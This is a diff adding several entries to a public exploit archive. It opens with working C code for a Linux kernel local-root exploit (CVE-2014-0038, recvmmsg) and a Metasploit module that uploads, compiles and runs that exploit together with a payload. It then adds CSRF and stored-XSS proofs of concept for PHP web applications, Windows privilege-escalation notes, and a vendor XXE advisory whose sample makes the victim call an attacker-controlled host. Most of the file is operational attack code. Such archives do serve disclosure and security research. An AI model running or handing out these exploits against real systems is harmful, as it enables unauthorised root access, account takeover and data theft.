NULL;i++) { + if(!strcmp(offsets[i].kernel_version,u.release)) { + off = &offsets[i]; + break; + } + } + + if(!off) { + fprintf(stderr,"no offsets for this kernel version..\n"); + exit(-1); + } + + mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1)); + mmapped &= 0x000000ffffffffff; + + srand(time(NULL)); + port = (rand() % 30000)+1500; + + commit_creds = (_commit_creds)off->commit_creds; + prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred; + + mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); + + if(mmapped == -1) { + perror("mmap()"); + exit(-1); + } + + memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3); + + memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300); + + if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) { + perror("mprotect()"); + exit(-1); + } + + sockfd = socket(AF_INET, SOCK_DGRAM, 0); + if (sockfd == -1) { + perror("socket()"); + exit(-1); + } + + sa.sin_family = AF_INET; + sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + sa.sin_port = htons(port); + + if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) { + perror("bind()"); + exit(-1); + } + + memset(msgs, 0, sizeof(msgs)); + + iovecs[0].iov_base = &buf; + iovecs[0].iov_len = BUFSIZE; + msgs[0].msg_hdr.msg_iov = &iovecs[0]; + msgs[0].msg_hdr.msg_iovlen = 1; + + for(i=0;i < 3 ;i++) { + udp(i); + retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i); + if(!retval) { + fprintf(stderr,"\nrecvmmsg() failed\n"); + } + } + + close(sockfd); + fprintf(stderr,"\n"); + trigger(); + } + } + + filename = rand_text_alphanumeric(8) + executable_path = "#{datastore['WritableDir']}/#{filename}" + payloadname = rand_text_alphanumeric(8) + payload_path = "#{datastore['WritableDir']}/#{payloadname}" + + def has_prereqs?() + gcc = cmd_exec('which gcc') + if gcc.include?('gcc') + vprint_good('gcc is installed') + else + print_error('gcc is not installed. Compiling will fail.') + end + return gcc.include?('gcc') + end + + compile = false + if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True' + if has_prereqs?() + compile = true + vprint_status('Live compiling exploit on system') + else + vprint_status('Dropping pre-compiled exploit on system') + end + end + if check != CheckCode::Appears + fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!') + end + + def upload_and_chmod(fname,fcontent) + print_status "Writing to #{fname} (#{fcontent.size} bytes)" + rm_f fname + write_file(fname, fcontent) + cmd_exec("chmod +x #{fname}") + register_file_for_cleanup(fname) + end + + if compile + recvmmsg.gsub!(/system\("\/bin\/sh -i"\);/, + "system(\"#{payload_path}\");") + upload_and_chmod("#{executable_path}.c", recvmmsg) + vprint_status("Compiling #{executable_path}.c") + cmd_exec("gcc -o #{executable_path} #{executable_path}.c") #compile + register_file_for_cleanup(executable_path) + else + path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2014-0038', 'recvmmsg') + fd = ::File.open( path, "rb") + recvmmsg = fd.read(fd.stat.size) + fd.close + upload_and_chmod(executable_path, recvmmsg) + # overwrite with the hardcoded variable names in the compiled versions + payload_filename = 'a0RwAacU' + payload_path = "/tmp/#{payload_filename}" + end + + upload_and_chmod(payload_path, generate_payload_exe) + stime = Time.now + vprint_status("Exploiting... May take 13min. Start time: #{stime}") + output = cmd_exec(executable_path) + output.each_line { |line| vprint_status(line.chomp) } + end +end \ No newline at end of file diff --git a/platforms/php/webapps/40493.html b/platforms/php/webapps/40493.html new file mode 100755 index 000000000..d92db9736 --- /dev/null +++ b/platforms/php/webapps/40493.html @@ -0,0 +1,94 @@ +# Exploit Title : Spacemarc News - Cross-Site Request +Forgery ( Add New Post) +# Author : Besim +# Google Dork : - +# Date : 10/10/2016 +# Type : webapps +# Platform : PHP +# Vendor Homepage : http://www.spacemarc.it +# Software link : + http://www.hotscripts.com/listings/jump/download/107255 + + +*########################### CSRF PoC ###############################* + + + + + +
+ +
+ + + +*####################################################################* diff --git a/platforms/php/webapps/40495.html b/platforms/php/webapps/40495.html new file mode 100755 index 000000000..bb2f181a1 --- /dev/null +++ b/platforms/php/webapps/40495.html @@ -0,0 +1,38 @@ + + + + + +
+ + + + + + + + + + + + +
+ + + + + \ No newline at end of file diff --git a/platforms/php/webapps/40496.html b/platforms/php/webapps/40496.html new file mode 100755 index 000000000..bb37b54ea --- /dev/null +++ b/platforms/php/webapps/40496.html @@ -0,0 +1,83 @@ + + + + + + +
+ +
+ + \ No newline at end of file diff --git a/platforms/php/webapps/40505.txt b/platforms/php/webapps/40505.txt new file mode 100755 index 000000000..4387582ac --- /dev/null +++ b/platforms/php/webapps/40505.txt @@ -0,0 +1,26 @@ +# Exploit Title : ApPHP MicroBlog 1.0.2 - Stored Cross +Site Scripting +# Author : Besim +# Google Dork : +# Date : 12/10/2016 +# Type : webapps +# Platform : PHP +# Vendor Homepage : - +# Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162 + +Description : + +Vulnerable link : http://site_name/path/index.php?page=posts&post_id= + +Stored XSS Payload ( Comments ): * + +# Vulnerable URL : +http://site_name/path/index.php?page=posts&post_id= - Post comment section +# Vuln. Parameter : comment_user_name + +############ POST DATA ############ + +task=publish_comment&article_id=69&user_id=&comment_user_name=&comment_user_email=besimweptest@yopmail.com&comment_text=Besim&captcha_code=DKF8&btnSubmitPC=Publish +your comment + +############ ###################### diff --git a/platforms/php/webapps/40506.html b/platforms/php/webapps/40506.html new file mode 100755 index 000000000..7cfe7abaf --- /dev/null +++ b/platforms/php/webapps/40506.html @@ -0,0 +1,155 @@ +# Exploit Title : ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author) +# Author : Besim +# Google Dork : +# Date : 12/10/2016 +# Type : webapps +# Platform : PHP +# Vendor Homepage : - +# Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162 + + + +########################### CSRF PoC ############################### + + + + + +
+ +
+ + + +#################################################################### diff --git a/platforms/windows/local/40494.txt b/platforms/windows/local/40494.txt new file mode 100755 index 000000000..5e6558ce5 --- /dev/null +++ b/platforms/windows/local/40494.txt @@ -0,0 +1,29 @@ +Minecraft Launcher: https://minecraft.net +Version: 1.6.61 +By Ross Marks: http://www.rossmarks.co.uk +Exploit-db: https://www.exploit-db.com/author/?a=8724 +Category: Local +Tested on: Windows 10 x86/x64 + +1) Insecure File Permissions Local Privilege Escalation + +Minecraft's launcher (minecraftLauncher.exe) suffers from an elevation of privileges +vulnerability which can be used by a simple user that can change the executable file +with a binary of choice. The vulnerability exist due to the improper permissions, +with the 'F' flag (Full) for 'Users' group, making the entire directory +'Minecraft' and its files and sub-dirs world-writable. + +This would allow an attacker the ability to inject code or replace the MinecraftLauncher +executable and have it run in the context of the system. + +PoC: + +C:\Program Files (x86)\Minecraft>icacls MinecraftLauncher.exe +MinecraftLauncher.exe BUILTIN\Users:(I)(F) + NT AUTHORITY\SYSTEM:(I)(F) + BUILTIN\Administrators:(I)(F) + PENTEST\ross.marks:(I)(F) + APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) + APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APP PACKAGES:(I)(RX) + +Successfully processed 1 files; Failed processing 0 files \ No newline at end of file diff --git a/platforms/windows/local/40497.txt b/platforms/windows/local/40497.txt new file mode 100755 index 000000000..d71cf386b --- /dev/null +++ b/platforms/windows/local/40497.txt @@ -0,0 +1,29 @@ +######################################################################### +# Exploit Title: sheed AntiVirus Unquoted Service Path Privilege Escalation +# Date: 11/10/2016 +# Author: Amir.ght +# Vendor Homepage: http://sheedantivirus.ir/ +# Software Link:http://dl.sheedantivirus.ir/setup.exe +#version : 2.3 (Latest) +# Tested on: Windows 7 +########################################################################## + +sheed AntiVirus installs a service with an unquoted service path +To properly exploit this vulnerability, +the local attacker must insert an executable file in the path of the service. +Upon service restart or system reboot, the malicious code will be run +with elevated privileges. +------------------------------------------- +C:\>sc qc ShavProt +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: ShavProt + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 0 IGNORE + BINARY_PATH_NAME : C:\Program Files\Sheed AntiVirus\shgrprot.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : ShavProt + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem diff --git a/platforms/xml/webapps/40501.txt b/platforms/xml/webapps/40501.txt new file mode 100755 index 000000000..4543b1e66 --- /dev/null +++ b/platforms/xml/webapps/40501.txt @@ -0,0 +1,140 @@ +SEC Consult Vulnerability Lab Security Advisory < 20161011-0 > +======================================================================= + title: XML External Entity Injection (XXE) + product: RSA Enterprise Compromise Assessment Tool (ECAT) + vulnerable version: 4.1.0.1 + fixed version: 4.1.2.0 + CVE Number: - + impact: Medium + homepage: https://www.rsa.com + found: 2016-04-27 + by: Samandeep Singh (Office Singapore) + SEC Consult Vulnerability Lab + + An integrated part of SEC Consult + Bangkok - Berlin - Linz - Montreal - Moscow + Singapore - Vienna (HQ) - Vilnius - Zurich + + https://www.sec-consult.com +======================================================================= + +Vendor description: +------------------- +"RSA provides more than 30,000 customers around the world with the essential +security capabilities to protect their most valuable assets from cyber threats. +With RSA's award-winning products, organizations effectively detect, +investigate, and respond to advanced attacks; confirm and manage identities; and +ultimately, reduce IP theft, fraud, and cybercrime." + +Source: https://www.rsa.com/en-us/company/about + + +Business recommendation: +------------------------ +By exploiting the XXE vulnerability, an attacker can get read access to the +filesystem of the user's system using RSA ECAT client and thus obtain sensitive +information from the system. It is also possible to scan ports of the internal +hosts and cause DoS on the affected host. + +SEC Consult recommends not to use the product until a thorough security +review has been performed by security professionals and all identified +issues have been resolved. + + +Vulnerability overview/description: +----------------------------------- +1) XML External Entity Injection +The used XML parser is resolving external XML entities which allows attackers +to read files and send requests to systems on the internal network (e.g port +scanning). The vulnerability can be exploited by tricking the user of +the application to import a whitelisting file with malicious XML code. + + +Proof of concept: +----------------- +1) XML External Entity Injection (XXE) + +The RSA ECAT client allows users to import whitelisting files in XML format. +By tricking the user to import an XML file with malicious XML code to the +application, it's possible to exploit an XXE vulnerability within the application. + +For example by importing the following XML code, arbitrary files can be read +from the client's system. The following code generates the connection request +from the client system to attacker system. + +=============================================================================== + + + ]>&xxe; +=============================================================================== + +IP:port = IP address and port where the attacker is listening for connections + +Furthermore some files can be exfiltrated to remote servers via the +techniques described in: + +https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf +http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf + + +Vulnerable / tested versions: +----------------------------- +The XXE vulnerability has been verified to exist in the RSA ECAT software +version 4.1.0.1 which was the latest version available at the time of +discovery. + + +Vendor contact timeline: +------------------------ +2016-04-28: Vulnerabilities reported to the vendor by 3rd party +2016-06-23: Fixed by vendor in version 4.1.2 (ECAT-5972) +2016-10-11: SEC Consult releases security advisory + + +Solution: +--------- +Update to version 4.1.2.0 + + +Workaround: +----------- +None + + +Advisory URL: +------------- +https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm + + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +SEC Consult Vulnerability Lab + +SEC Consult +Bangkok - Berlin - Linz - Montreal - Moscow +Singapore - Vienna (HQ) - Vilnius - Zurich + +About SEC Consult Vulnerability Lab +The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It +ensures the continued knowledge gain of SEC Consult in the field of network +and application security to stay ahead of the attacker. The SEC Consult +Vulnerability Lab supports high-quality penetration testing and the evaluation +of new offensive and defensive technologies for our customers. Hence our +customers obtain the most current information about vulnerabilities and valid +recommendation about the risk profile of new technologies. + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Interested to work with the experts of SEC Consult? +Send us your application https://www.sec-consult.com/en/Career.htm + +Interested in improving your cyber security with the experts of SEC Consult? +Contact our local offices https://www.sec-consult.com/en/About/Contact.htm +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +EOF S. Singh / @2016 \ No newline at end of file